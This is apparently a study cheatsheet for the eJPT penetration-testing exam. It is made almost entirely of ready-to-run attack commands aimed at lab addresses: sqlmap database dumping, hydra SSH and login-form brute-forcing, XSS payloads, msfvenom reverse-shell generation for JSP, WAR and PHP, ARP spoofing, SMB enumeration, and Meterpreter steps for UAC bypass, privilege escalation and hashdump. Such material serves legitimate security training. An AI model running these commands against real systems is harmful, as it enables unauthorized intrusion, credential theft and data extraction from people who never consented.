eJPT-Cheatsheet

This is a Cheatsheet for eJPT exam + course.

Nmap

nmap -sn 10.10.10.0/24
nmap -sV -p- -iL targets -oN nmap.initial -v
nmap -A -p- -iL targets -oN nmap.aggressive -v
nmap -p --script=vuln -v

fPing

fping -a -g 10.10.10.0/24 2>/dev/null > targets

IP Route

Syntax
ip route add <Network-range> via <router-IP> dev <interface>
eg.
ip route add 10.10.10.0/24 via 10.10.11.1 dev tap0

John

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

dirb

dirb http://10.10.10.10/
dirb http://10.10.10.10/dir -u admin:admin

I suggest you to use dirbuster for better speed. Keep the threads at 20. Use /usr/share/wordlists/dirb/common.txt wordlist.

Netcat

Listening for reverse shell
nc -nvlp 1234

Banner Grabbing
nc -nv 10.10.10.10 <port>

SQLMap

Check if injection exists

sqlmap -r Post.req
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin"

Get database if injection Exists

sqlmap -r login.req --dbs
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs\

Get Tables in a Database

sqlmap -r login.req -D dbname --tables
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables

Get data in a Database tables

sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump

Hydra

SSH Login Bruteforcing
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u 10.10.10.10 ssh
hydra -v -V -u -l root -P passwords.txt -t 1 -u 10.10.10.10 ssh
You can use same for FTP, just replace ssh with ftp

HTTP POST Form
hydra http://10.10.10.10/ http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect credentials" -L usernames.txt -P passwords.txt -f -V

You will know which wordlists to use when the time comes

XSS

<script>alert(1)</script>
<ScRiPt>alert(1)</ScRiPt>

This is a great filter bypass cheatsheet
https://owasp.org/www-community/xss-filter-evasion-cheatsheet

msfvenom shells

JSP Java Meterpreter Reverse TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

Metasploit Meterpreter autoroute

run autoroute -s 10.10.10.0/24

ARPSpoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i -t -r
arpspoof -i tap0 -t 10.100.13.37 -r 10.100.13.36

SMB Enumeration

Get shares, users, groups, password policy
smbclient -L //10.10.10.10/
enum4linux -U -M -S -P -G 10.10.10.10
nmap --script=smb-enum-users,smb-os-discovery,smb-enum-shares,smb-enum-groups,smb-enum-domains 10.10.10.10 -p 135,139,445 -v
nmap -p445 --script=smb-vuln-* 10.10.10.10 -v

Access Share
smbclient //10.10.10.10/share_name

FTP Enumeration

nmap --script=ftp-anon 10.10.10.10 -p21 -v
nmap -A -p21 10.10.10.10 -v

Login to FTP server
ftp 10.10.10.10

Meterpreter

ps
getuid
getpid
getsystem
ps -U SYSTEM

CHECK UAC/Privileges
run post/windows/gather/win_privs

BYPASS UAC
Background the session first
exploit/windows/local/bypassuac
set session

After PrivEsc
migrate <pid>
hashdump

Windows Command Line

To search for a file starting from current directory
dir /b/s "*.conf*"
dir /b/s "*.txt*"
dir /b/s "*filename*"

Check routing table
route print
netstat -r

Check Users
net users

List drives on the machine
wmic logicaldisk get Caption,Description,providername